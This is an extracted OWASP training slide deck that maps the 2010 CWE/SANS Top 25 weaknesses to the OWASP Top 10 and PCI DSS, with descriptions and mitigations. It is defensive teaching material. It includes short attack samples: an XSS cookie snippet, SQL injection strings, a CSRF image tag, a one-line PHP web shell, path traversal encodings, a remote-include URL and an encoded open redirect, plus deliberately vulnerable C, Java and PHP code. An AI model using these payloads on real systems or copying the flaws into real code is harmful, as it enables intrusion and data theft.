- OWASP CBT Project
advertisement
OWASP Education
The OWASP Foundation
Computer based training
http://www.owasp.org
2010 CWE/SANS Top 25
with OWASP Top 10 and PCI DSS V2 Mapping
Nishi Kumar
Keith Turpin
IT Architect Specialist, FIS
OWASP CBT Project Lead
OWASP Global Industry Committee
The Boeing Company
OWASP Secure Coding Practices Lead
OWASP Global Projects Committee
Nishi.Kumar@owasp.org
keith.turpin@owasp.org
Objectives
Provide an overview of the 2010 CWE/SANS Top 25
Discuss mapping relationships between CWE/SANS Top 25,
OWASP Top 10 for 2010 and PCI DSS V2
Understand the CWE/SANS Top 25 weaknesses and
how to remediate them
2
Organizations
MITRE - http://www.mitre.org/
The MITRE Corporation is a not-for-profit organization that manages
several Federally Funded Research and Development Centers. Mitre
currently runs various IT security projects including the Common
Weakness Enumeration (CWE) and it is the official source for the
CWE/SANS Top 25 Most Dangerous Software Errors.
CWE Database - http://cwe.mitre.org/
SANS - http://www.sans.org
The SysAdmin, Audit, Network, Security (SANS) Institute operates as
a commercial research and education company. SANS is well known
for its Internet Storm Center, its comprehensive list computing security
training programs and its work with Mitre on the CWE/SANS Top 25
Most Dangerous Software Errors.
3
Selection and Ranking
Builds on the original 2009 version
Methodology - Qualitative rather than quantitative
Factors in ranking - Prevalence and Severity
Initially started with 41 candidate weaknesses
4
2010 CWE/SANS Top 25
Rank
ID
Name
[1]
CWE-79
[2]
CWE-89
[3]
CWE-120
[4]
[5]
[6]
[7]
CWE-352
CWE-285
CWE-807
CWE-22
[8]
[9]
CWE-434
CWE-78
[10]
[11]
[12]
CWE-311
CWE-798
CWE-805
Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection')
Buffer Copy without Checking Size of Input ('Classic Buffer
Overflow')
Cross-Site Request Forgery (CSRF)
Improper Authorization
Reliance on Untrusted Inputs in a Security Decision
Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')
Unrestricted Upload of File with Dangerous Type
Improper Neutralization of Special Elements used in an OS
Command ('OS Command Injection')
Missing Encryption of Sensitive Data
Use of Hard-coded Credentials
Buffer Access with Incorrect Length Value
5
SANS CWE Top 25
Rank
ID
Name
[13]
CWE-98
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
[22]
[23]
[24]
[25]
CWE-129
CWE-754
CWE-209
CWE-190
CWE-131
CWE-306
CWE-494
CWE-732
CWE-770
CWE-601
CWE-327
CWE-362
Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP File Inclusion')
Improper Validation of Array Index
Improper Check for Unusual or Exceptional Conditions
Information Exposure Through an Error Message
Integer Overflow or Wraparound
Incorrect Calculation of Buffer Size
Missing Authentication for Critical Function
Download of Code Without Integrity Check
Incorrect Permission Assignment for Critical Resource
Allocation of Resources Without Limits or Throttling
URL Redirection to Untrusted Site ('Open Redirect')
Use of a Broken or Risky Cryptographic Algorithm
Concurrent Execution using Shared Resource with
Improper Synchronization ('Race Condition')
6
OWASP Top 10 & SANS CWE Top 25 mapping
https://www.owasp.org/index.php/
Category:OWASP_Top_Ten_Project
A1: Injection
http://www.sans.org/top25-software-errors/
http://cwe.mitre.org/top25/
[2] CWE-89:
[9] CWE-78:
Improper Neutralization of Special Elements
used in an SQL Command
('SQL Injection')
Improper Neutralization of Special
Elements used in an OS Command
('OS Command Injection')
A2: Cross-Site Scripting
(XSS)
[1] CWE-79:
Improper Neutralization of Input During
Web Page Generation('Cross-site Scripting')
A3: Broken Authentication and Session
Management
[19] CWE-306:
[11] CWE-798:
Missing Authentication for Critical Function
Use of Hard-coded Credentials
A4: Insecure Direct Object References
[5] CWE-285:
[6] CWE-807:
Improper Authorization
Reliance on Untrusted Inputs in a Security
Decision
Improper Limitation of a Pathname to a
Restricted Directory ('Path Traversal')
[7] CWE-22:
A5: Cross-Site Request Forgery (CSRF) [4] CWE-352:
Cross-Site Request Forgery (CSRF)
7
OWASP Top 10 & SANS CWE Top 25 mapping
A6:
Security Misconfiguration
[16] CWE-209:
Information Exposure Through an Error Message
(Only partially covers OWASP Risk)
A7:
Insecure Cryptographic
Storage
[10] CWE-311:
[24] CWE-327:
Missing Encryption of Sensitive Data
Use of a Broken or Risky Cryptographic Algorithm
A8:
Failure to Restrict URL
Access
[5] CWE-285:
Improper Authorization
(Also listed with OWASP A-4)
Incorrect Permission Assignment for Critical
Resource (CWE-732 covers a broader scope than
OWASP A8)
[21] CWE-732:
A9:
Insufficient Transport
Layer Protection
[10] CWE-311:
[24] CWE-327:
A10: Unvalidated Redirects
and Forwards
[23] CWE-601:
Missing Encryption of Sensitive Data
(Also listed with OWASP A-7)
Use of a Broken or Risky Cryptographic Algorithm
(Also listed with OWASP A-7)
URL Redirection to Untrusted Site
('Open Redirect')
8
SANS CWE Top 25
The following do not directly map to the OWASP Top 10 2010
[3] CWE-120:
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[8] CWE-434:
Unrestricted Upload of File with Dangerous Type
[12] CWE-805: Buffer Access with Incorrect Length Value
[13] CWE-98: Improper Control of Filename for Include/Require Statement in PHP
Program ('PHP File Inclusion')
[14] CWE-129: Improper Validation of Array Index
[15] CWE-754: Improper Check for Unusual or Exceptional Conditions
[17] CWE-190: Integer Overflow or Wraparound
[18] CWE-131: Incorrect Calculation of Buffer Size
[20] CWE-494: Download of Code Without Integrity Check
[22] CWE-770: Allocation of Resources Without Limits or Throttling
[25] CWE-362: Concurrent Execution using Shared Resource with Improper
Synchronization ('Race Condition')
9
Mapping Considerations
SANS CWE Top 25 is only a fraction of the full CWE
list of weaknesses
SANS CWE Top 25 target both web and non-web
applications
OWASP defines ten risks focused on web applications
OWASP's list tends to have broader weaknesses made up of several specific vulnerabilities
PCI DSS Requirements point to both as industry best
practices
10
[1] CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
OWASP Top 10 and PCI Mapping
• OWASP 2010: A2 Cross-Site Scripting (XSS)
• PCI-DSS V2: 6.5.7 Cross-site scripting (XSS)
General Description
• The software does not properly neutralize user-controllable input before
using it in a web page. Variants include:
• Reflected: The software reads data directly from the HTTP request
and reflects it back in the HTTP response
• Stored: The software stores data in a database or other trusted data
store and includes that data as part of a future web page
• DOM: Client supplied input is inserted into an HTML response page
by a client side script that processed Document Object Model (DOM)
data (e.g. document.location, document.URL, etc)
Try this in your browser: <script>javascript:alert(document.cookie)</script>
11
[1] CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Potential Impacts
• Theft of session credentials, networks scans, key stroke loggers, XSS
Proxy (allowing full control and viewing of exploited browser)
Common Mitigations
• Properly neutralize all input from the client. Be sure to address all content
used by the software, that originated in an HTTP Request
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
• Establish and enforce appropriate data type, range and length controls for
all content
• Use a vetted library or framework to make it easier to generate properly
encoded output including Microsoft's Anti-XSS library, the OWASP ESAPI
Encoding module, and Apache Wicket
E.g. output encoding < becomes &lt;, > becomes &gt; & becomes &amp; and " becomes &quot
<script> -> &lt;script&gt; (markup)
12
[2] CWE-89
Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection')
OWASP Top 10 and PCI Mapping
• OWASP 2010:
• PCI-DSS V2:
A1 Injection
6.5.1 Injection flaws, particularly SQL injection.
General Description
• The software constructs a dynamic SQL statement using input that has
not been properly neutralized
• Example of dynamic query modification:
• String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") +"'";
• The attacker modifies the ‘id’ parameter in their browser to send: ' or
'1'='1
• This changes the meaning of the query to return all the records from
the accounts database, instead of only the intended customer’s
• http://example.com/app/accountView?id=' or '1'='1
13
[2] CWE-89
Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection')
Potential Impacts
• Unauthorized access to data, authentication bypass,
compromise of the host OS, use of database utilities to breach
a perimeter (when the DB is deployed along network boundaries)
Common Mitigations
• Use a safe API to avoid using the interpreter entirely or to provide
parameterized interface
• Use strongly typed parameterized queries
String sqlString = "select * from db_user where username=? …
PreparedStatement stmt = connection.prepareStatement(sqlString);
stmt.setString (1, username); …
• Input validation-Validate and Filter user input to remove special characters
' " ` ; * % _ =&\|*?~<>^()[]{}$\n\r
• Utilize output encoding
• Turn off all unnecessary database functionality
14
[3] CWE-120
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
General Description
• The software copies an input buffer to an output buffer without verifying
that the size of the input buffer is less than the size of the output buffer
• Effects: C, C++ and Assembly
Example: C
char last_name[20]; ...................................Declare array with 20 character limit
printf ("Enter your last name: ");
scanf ("%s", last_name); ...........................Get input (no limit) and store in array
The software does not limit the size of the name entered by the user, so an entry of more than 20
characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters
15
[3] CWE-120
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Potential Impacts
• Allow for the execution of arbitrary code, which is usually
outside the scope of a program's implicit security policy
Common Mitigations
• Use a language that does not allow this weakness to occur (e.g., Java)
• Use a vetted library or framework that help prevent this weakness (e.g.,
Strsafe.h library from Microsoft)
• Use a compiler with features or extensions that provide a protection
mechanism against buffer overflows
• Ensure the destination buffer size is equal to or larger than the source
buffer size
• Utilize input validation to enforce length limits
16
[4] CWE-352
Cross-Site Request Forgery (CSRF)
OWASP Top 10 and PCI Mapping
• OWASP 2010: A5 Cross-Site Request Forgery (CSRF)
• PCI-DSS V2: 6.5.9 Cross-site request forgery (CSRF)
General Description
• If the software does not sufficiently verify that the user "intentionally"
submitted a request, a user with an active session may be tricked into
executing an unintended action on the software. This URL and required
parameters must be known to the attacker
Example of a legitimate request:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
Example or a forged request using a hidden image tag:
<img src=http://example.com/app/transferFunds?amount=1500&destinationAccount=
attackersAcct# width="0" height="0" />
17
[4] CWE-352
Cross-Site Request Forgery (CSRF)
Potential Impacts
• Attackers can cause the victim to execute any action the victim
is authorized to perform
Common Mitigations
• Use a vetted library to prevent this weakness (e.g., OWASP CSRFGuard,
OWASP ESAPI Session Management control)
• Include an unpredictable token in each form and verify the token upon
receipt of the form
• Utilize the HTTP POST method to avoid exposing the token in the URL
• Re-authenticate users prior to performing critical operations
18
[5] CWE-285
Improper Authorization
OWASP Top 10 and PCI Mapping
• OWASP 2010: A8 Failure to Restrict URL Access
• A4 Insecure Direct Object References
• PCI-DSS V2: 6.5.8 Improper Access Control
General Description
• The software does not perform or incorrectly performs an authorization
check when an attempt is made to access a resource or perform an
action
• Software uses interface or link visibility as an access control. URLs do
not have the status of secrets. They are displayed on screen, appear in
browser histories and log files, may be shared by users and are known to
previously privileged users whose role has changed
19
[5] CWE-285
Improper Authorization
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Enforce authorization controls on every request
• Map roles and use role-based access control (RBAC) to enforce the roles
at the appropriate boundaries
• Enforce application logic flows to comply with business rules
• Restrict access to files, URLs, protected functions, direct object
references, services, application data, user and data attributes and
security-relevant configuration information to only authorized users
20
[6] CWE-807
Reliance on Untrusted Inputs in a Security Decision
OWASP Top 10 and PCI Mapping
• OWASP 2010: A4 Insecure Direct Object References
• PCI-DSS V2: 6.5.8 Improper Access Control
General Description
• The software does not perform or incorrectly performs an authorization
check when an attempt is made to access a resource or perform an
action
• The software bases access decisions on client accessible state data.
(e.g., https://example.com/accountInfo?acct=not-my-acct)
• State information can be stored in various locations such as a cookie, a
parameter, an environment variable, a client side database record or
within a settings file. All of these locations have the potential to be
modified by an attacker
• In web applications, state data may be any item in the HTTP request that
is used in addition to the session identifier to make access decisions
21
[6] CWE-807
Reliance on Untrusted Inputs in a Security Decision
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Enforce authorization controls on every request
• Store state information and sensitive data only on a trusted system (e.g.
the server)
• If state data must be stored on the client, use encryption and integrity
checking on the server side to prevent state tampering. (e.g., ASP.NET
View State)
• Enforce application logic flows to comply with business rules
22
[7] CWE-22
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
OWASP Top 10 and PCI Mapping
• OWASP 2010: A4 Insecure Direct Object References
• PCI-DSS V2: 6.5.8 Improper Access Control
General Description
• The software constructs dynamic directory or file path statements based
on user supplied input that is not properly neutralized for special
elements that can alter the path
• The “dot-dot-slash (../ or ..\)” sequences can be used to move up the
directory structure and then navigate to a new location
• Where international characters are supported, extended UTF-8 encoding
may also work and may bypass validation checking
(e.g., %c0%ae%c0%ae/%c0%ae%c0%ae/ = ../../)
• Injecting a null byte may allow an attacker to truncate a generated
filename to widen the scope of attack.(e.g. the software may add ".txt" to
any pathname, but submitting File%00 may bypass this restriction
23
[7] CWE-22
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Potential Impacts
• Unauthorized access to read, create or overwrite critical files
Common Mitigations
• Properly neutralize all input from the client especially path characters (., /,
\) and null bytes (%00)
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
• Reduce input encodings and representations of data to a single simple
form before validating
• Use parameterized place holders that map to the target, instead of actual
file names or paths (e.g., client only sees id=1, on the server id 1 maps to
file.txt )
24
[8] CWE-434
Unrestricted Upload of File with Dangerous Type
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: N/A
General Description
• The software allows the for the uploading or transfer files of dangerous
types that can be automatically processed within the product's
environment
• In a web application the intent may be to allow users to upload image
files. However if proper validation of the file type is not done the user
may upload something else like malicious.php and then access that file
to gain unauthorized privileges. The malicious.php file could do anything
including providing access to the host OS:
Example: PHP
<?php
system($_GET['cmd']);
?>
25
[8] CWE-434
Unrestricted Upload of File with Dangerous Type
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• The software should generate its own filename for an uploaded file
instead of the user-supplied filename
• Validate uploaded files are the expected type by checking file headers
• Prevent or restrict the uploading of any file that may be interpreted by the
web server
• Turn off execution privileges on file upload directories
• Do not save files in the same web context as the application
26
[9] CWE-78
Improper Neutralization of Special Elements used in an OS Command
('OS Command Injection')
OWASP Top 10 and PCI Mapping
• OWASP 2010: A1 Injection
• PCI-DSS V2: 6.5.1 Injection flaws
General Description
• The software constructs all or part of an OS command using input that
has not been properly neutralized
• Variants include:
• The software intends to execute a single, fixed program that is under its
own control using externally-supplied inputs as arguments to that
program. However, if the program does not remove command
separators from input, separators in the argument for the execution of
additional programs
• The software accepts an input that it uses to fully select which program
to run, as well as which commands to use. The application redirects this
entire command to the operating system
27
[9] CWE-78
Improper Neutralization of Special Elements used in an OS Command
('OS Command Injection')
Potential Impacts
• Execution of arbitrary code, authentication bypass, compromise of the
host OS
Common Mitigations
• Utilize task specific built-in APIs to conduct operating system tasks
• Run code in a "jail" or similar sandbox environment that enforces strict
boundaries between the process and the operating system
• Properly neutralize all input from the client, especially command
separators and special characters which can effect intended execution
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
28
[10] CWE-311
Missing Encryption of Sensitive Data
OWASP Top 10 and PCI Mapping
• OWASP 2010: A7 Insecure Cryptographic Storage
• A9: Insufficient Transport Layer Protection
• PCI-DSS V2: 6.5.3 Insecure cryptographic storage
• 6.5.4 Insecure communications
• Additionally: 2.3, 3.4, 3.5, 3.6, 4.1, 4.2, 8.4
General Description
• The software does not encrypt sensitive or critical information before
storage or transmission
• Unencrypted network traffic may be intercepted, monitored or in some
cases altered
• Sensitive information stored in plain text may be accessed without
authorization if the data store is reached
29
[10] CWE-311
Missing Encryption of Sensitive Data
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Implement encryption for the transmission of all sensitive information and
for conducting critical operations (e.g., TLS, SSH and SFTP)
• Prevent unauthorized access by encrypting sensitive data, even on
trusted systems
• Select a well-vetted algorithm that is currently considered to be strong
(e.g., FIPS 140-2 or an equivalent standard). Periodically ensure that the
cryptography used by the software has not become obsolete
• If the software relies on wireless communications, implement strong
encryption for authentication and transmission
30
[11] CWE-798
Use of Hard-coded Credentials
OWASP Top 10 and PCI Mapping
• OWASP 2010: A3 Broken Authentication and Session Management
• PCI-DSS V2: 8.5 Ensure proper user identification and
authentication management
General Description
• The software contains hard-coded credentials, such as a password or
cryptographic key, which it uses for its own inbound authentication,
outbound communication to external components, or encryption of internal
data
• Variants include:
• Inbound: The software contains an authentication mechanism that
checks the input credentials against a hard-coded set of credentials
• Outbound: The software connects to another system or component,
and it contains hard-coded credentials for connecting to that
component
31
[11] CWE-798
Use of Hard-coded Credentials
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Outbound Authentication: Store passwords, keys, and other credentials
outside of the code in a strongly-protected, encrypted configuration file or
database that is protected from access by all outsiders, including other local
users on the same system
• Inbound Authentication: Rather than hard-code a default username and
password, key, or other authentication credentials for first time logins, utilize
a "first login" mode that requires the user to enter a unique strong password
or key
• If the software must contain hard-coded credentials or they cannot be
removed, perform access control checks and limit which entities can access
the feature that requires the hard-coded credentials
32
[12] CWE-805
Buffer Access with Incorrect Length Value
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
General Description
• The software uses a sequential operation to read or write a buffer, but it
uses an incorrect length value that causes it to access memory that is
outside of the bounds of the buffer
• When the length value exceeds the size of the destination, a buffer
overflow could occur
• Effects: C, C++ and Assembly
33
[12] CWE-805
Buffer Access with Incorrect Length Value
Potential Impacts
• Allow for the execution of arbitrary code, which is usually
outside the scope of a program's implicit security policy
Common Mitigations
• Use a language that does not allow this weakness to occur (e.g., Java)
• Use a vetted library or framework that help prevent this weakness (e.g.,
Strsafe.h library from Microsoft)
• Use a compiler with features or extensions that provide a protection
mechanism against buffer overflows
• Ensure the destination buffer size is equal to or larger than the source
buffer size
• Utilize input validation to enforce length limits
34
[13] CWE-98
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
File Inclusion')
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: N/A
General Description
• The PHP application receives input from an upstream component, but it
does not restrict or incorrectly restricts the input before its usage in
"require," "include," or similar functions
• The following code attempts to include a function contained in a separate
PHP page by building a path to the file using the supplied 'module_name'
parameter and appending the string '/function.php' to it. The value of $dir
is not restricted and could be manipulated by submitting an unanticipated
parameter for 'module_name'
Example: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php");
Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com
35
[13] CWE-98
Improper Control of Filename for Include/Require Statement in PHP Program
('PHP File Inclusion')
Potential Impacts
• Execution of arbitrary code,
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Properly neutralize all input from the client especially path characters (., /, \)
and null bytes (%00)
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
• Use parameterized place holders that map to the target, instead of actual
file names or paths (e.g., client only sees id=1, on the server id 1 maps to
file.txt )
• Run your code in a "jail" or similar sandbox environment that enforces strict
boundaries between the process and the operating system
• Set allow_url_fopen to false, which limits the ability to include files from
remote locations
36
[14] CWE-129
Improper Validation of Array Index
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
General Description
• The software uses untrusted input when calculating or using an array
index, but the product does not validate or incorrectly validates the index
to ensure the index references a valid position within the array
• When the length value exceeds the size of the destination, a buffer
overflow could occur
Example: Java
public String getValue(int index) {
return array[index];
}
If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds
Exception being raised
37
[14] CWE-129
Improper Validation of Array Index
Potential Impacts
• System crash
• Allow for the execution of arbitrary code
• Unauthorized access to read or modify data
Common Mitigations
• Use program level exception handlers if they are available (e.g., Java,
Ruby)
• Utilize input validation to enforce length and range limits
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
• Run your code in a "jail" or similar sandbox environment that enforces
strict boundaries between the process and the operating system
38
[15] CWE-754
Improper Check for Unusual or Exceptional Condition
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
• 6.5.5 Improper error handling
General Description
• The software does not check or improperly checks for unusual or
exceptional conditions that are not expected to occur frequently during
day to day operation of the software
Example: Java
(Bad Code)Example Language: Java
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
...
}
The code does not check to see if the string returned by getParameter() is null before
calling the member function compareTo(), potentially causing a NULL dereference.
39
[15] CWE-754
Improper Check for Unusual or Exceptional Condition
Potential Impacts
• System crash
• Allow for the execution of arbitrary code
• Unauthorized access to read or modify data
Common Mitigations
• Use program level exception handlers if they are available (e.g., Java,
Ruby)
• Check the results of all functions that return a value and verify that the
value is expected
• Ensure that error messages only contain minimal details that are useful to
the intended audience
• If the program must fail, ensure it fails securely
• Ensure the software can handle low resource conditions
40
[16] CWE-209
Information Exposure Through an Error Message
OWASP Top 10 and PCI Mapping
• OWASP 2010: A6: Security Misconfiguration
• PCI-DSS V2: 6.5.5 Improper error handling
General Description
• The software generates an error message that includes sensitive
information about its environment, users, or associated data
Example: Java
try {
/.../
} catch (Exception e) {
System.out.println(e);
}
If this output is redirected to a web user, this may represent a security problem
In the following example, sensitive information might be printed depending on the exception
that occurs. If an exception related to SQL is handled by the catch, then the output might
contain sensitive information such as SQL query structure or private information.
41
[16] CWE-209
Information Exposure Through an Error Message
Potential Impacts
• Unauthorized access to sensitive information, including details
about the software or its components
Common Mitigations
• Use program level exception handlers if they are available (e.g., Java,
Ruby)
• Ensure that error messages only contain minimal details that are useful to
the intended audience. Error messages to users should not display
system details, session identifiers, account information, debugging or
stack trace information
• In web applications implement generic error messages and use custom
error pages
42
[17] CWE-190
Integer Overflow or Wraparound
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
General Description
• The software performs a calculation that can produce an integer overflow
or wraparound, when the logic assumes that the resulting value will
always be larger than the original value
Example: C
nresp = packet_get_int();
if (nresp > 0) {
response = xmalloc(nresp*sizeof(char*));
for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL);
}
If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the
result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will
be 0, causing the subsequent loop iterations to overflow the heap buffer response
43
[17] CWE-190
Integer Overflow or Wraparound
Potential Impacts
• System crash
• Allow for the execution of arbitrary code
• Data Corruption
Common Mitigations
• Ensure that all protocols are strictly defined, such that all out-of-bounds
behavior can be identified simply, and require strict conformance to the
protocol
• Use libraries or frameworks that make it easier to handle numbers
without unexpected consequences. (e.g., SafeInt (C++) or IntegerLib (C
or C++)
• Utilize input validation to enforce length and range limits
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
44
[18] CWE-131
Incorrect Calculation of Buffer Size
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: 6.5.2 Buffer overflow
General Description
• The software does not correctly calculate the size to be used when
allocating a buffer, which could lead to a buffer overflow
Example: C
int *id_sequence;
id_sequence = (int*) malloc(3);
if (id_sequence == NULL) exit(1);
id_sequence[0] = 13579;
id_sequence[1] = 24680;
id_sequence[2] = 97531;
The size parameter used during the malloc() call is set to '3' which results in a buffer of 3
bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4
bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer
overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space
45
[18] CWE-131
Incorrect Calculation of Buffer Size
Potential Impacts
• System crash
• Allow for the execution of arbitrary code
• Unauthorized access to read or modify data
Common Mitigations
• If you allocate a buffer for the purpose of transforming, converting, or
encoding an input, make sure that you allocate enough memory to handle
the largest possible encoding
• Understand your programming language's underlying representation and
how it interacts with numeric calculation
• Utilize input validation to enforce length and range limits
• Conduct all data validation and encoding on a trusted system (e.g., The
server)
46
[19] CWE-306
Missing Authentication for Critical Function
OWASP Top 10 and PCI Mapping
• OWASP 2010: A3 Broken Authentication and Session Management
• PCI-DSS V2: 8.5 Ensure proper user identification and
authentication management
General Description
• The software does not perform any authentication for functionality that
requires a provable user identity or consumes a significant amount of
resources
47
[19] CWE-306
Missing Authentication for Critical Function
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• Utilize authentication for all information, resources and functionality, except
those specifically intended to be public
• Ensure all authentication controls operate on a trusted system
• Use a standardized, centralized, and tested implementation for all
authentication controls
• Authentication services should utilize a centralized authentication store
• All authentication controls need to fail securely
• Map roles and use role-based access control (RBAC) to enforce the roles
at the appropriate boundaries
48
[20] CWE-494
Download of Code Without Integrity Check
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: N/A
General Description
• The product downloads source code or an executable from a remote
location and executes the code without sufficiently verifying the origin
and integrity of the code
Example: Java
URL[] classURLs= new URL[]{
new URL("file:subdir/")
};
URLClassLoader loader = new URLClassLoader(classURLs);
Class loadedClass = Class.forName("loadMe", true, loader);
This code does not ensure that the class loaded is the intended one, for example by
verifying the class's checksum.
49
[20] CWE-494
Download of Code Without Integrity Check
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software or hosting environment's
security controls
Common Mitigations
• Perform proper forward and reverse DNS lookups to detect DNS spoofing
• Encrypt the code with a reliable encryption scheme before transmitting
• Perform integrity checking on the transmitted code
• Use code signing technologies such as Authenticode
50
[21] CWE-732
Incorrect Permission Assignment for Critical Resource
OWASP Top 10 and PCI Mapping
• OWASP 2010: A8 Failure to Restrict URL Access
• PCI-DSS V2: 6.5.8 Improper Access Control
General Description
• The software specifies permissions for a security-critical resource in a
way that allows that resource to be read or modified by unintended
actors
• Assumptions might be made about the environment in which the
software runs, but changes to the environment, data sensitivity or user
groups might result in inappropriate permissions
• Permissions may be set loose in order to minimize problems installation
and configuration. The software may require the administrator to
proactively lock it down before moving to production, which does not
always happen
51
[21] CWE-732
Incorrect Permission Assignment for Critical Resource
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
• When using a critical resource verify that it has secure permissions
• During program startup, explicitly set the default permissions or umask to
the most restrictive setting possible. Also set the appropriate permissions
during program installation
• For all configuration files, executables, and libraries, make sure that they
are only readable and writable by the software's administrator
• Do not assume that the system administrator will manually change the
configuration to the settings that you recommend in the manual
• Map roles and use role-based access control (RBAC) to enforce the roles
at the appropriate boundaries
52
[22] CWE-770
Allocation of Resources Without Limits or Throttling
OWASP Top 10 and PCI Mapping
• OWASP 2010: N/A
• PCI-DSS V2: N/A
General Description
• The software allocates a reusable resource or group of resources on behalf
of an actor without imposing any restrictions on how many resources can be
allocated, in violation of the intended security policy for that actor
Example: C and C++
sock=socket(AF_INET, SOCK_STREAM, 0);
while (1) {
newsock=accept(sock, ...);
printf("A connection has been accepted\n");
pid = fork();
}
This code allocates a socket and forks each time it receives a new connection. The program
does not track how many connections have been made, and it does not limit the number of
connections. A large number of connections could cause the system to run out of resources
53
[22] CWE-770
Allocation of Resources Without Limits or Throttling
Potential Impacts
• Denial of service
Common Mitigations
• Clearly specify the minimum and maximum expectations for capabilities,
and dictate which behaviors are acceptable when resource allocation
reaches limits
• Limit the amount of resources that are accessible to unprivileged users.
Set per-user limits for resources. Allow the system administrator to define
these limits. Be careful to avoid CWE-410
• Design throttling mechanisms into the system architecture
• Ensure that protocols have specific limits of scale placed on them
• If the program must fail, ensure that it fails securely
54
[23] CWE-601
URL Redirection to Untrusted Site ('Open Redirect')
OWASP Top 10 and PCI Mapping
• OWASP 2010: A10 Unvalidated Redirects and Forwards
• PCI-DSS V2: N/A
General Description
• A web application accepts a user-controlled input that specifies a link to
an external site, and uses that link in a Redirect
Example: PHP
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
This page could be used as part of a phishing scam by initialing on a trusted domain, but
redirecting users to a malicious site. An attacker could supply a user with the following link:
http://example.com/example.php?url=http://malicious.example.com
This is the same URL only obfuscated with URL encoding to mask the off site redirect:
http://example.com/example.php?url=%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%6
9%6f%75%73%2e%65%78%61%6d%70%6c%65%2e%63%6f%6d
55
[23] CWE-601
URL Redirection to Untrusted Site ('Open Redirect')
Potential Impacts
• Compromise of the client machine through malware exposure
• Client credential or sensitive information exposure through
spoofing content that implies the user is still on the trusted
web site
Common Mitigations
• When the set of acceptable URLs, is limited or known, create a mapping
from a set of fixed input values (such as numeric IDs) to the actual
filenames or URLs, and reject all other inputs
• Do not pass user supplied data into a dynamic redirect. If this must be
allowed, then the redirect should accept only validated, relative path URLs
• If absolute paths are used, either have the page add the domain
component or strictly validate the domain
• Use an intermediate disclaimer page that provides the user with a clear
warning that they are leaving your site
56
[24] CWE-327
Use of a Broken or Risky Cryptographic Algorithm
OWASP Top 10 and PCI Mapping
• OWASP 2010: A7: Insecure Cryptographic Storage
• A9: Insufficient Transport Layer Protection
• PCI-DSS V2: 4.1 Use strong cryptography and security protocols
• 6.5.3 Insecure cryptographic storage
General Description
• The software uses a broken or risky cryptographic algorithm. The
algorithm may be dangerous because it is non-standard or because it is
known to be weak
• The Data Encryption Standard (DES) was once considered a strong
algorithm, however it is now regarded as insufficient for many
applications and has been replaced by Advanced Encryption Standard
(AES)
57
[24] CWE-327
Use of a Broken or Risky Cryptographic Algorithm
Potential Impacts
• Unauthorized access to read or modify data
• Ability to gain additional privileges that could lead to a
complete compromise of the software's security controls
Common Mitigations
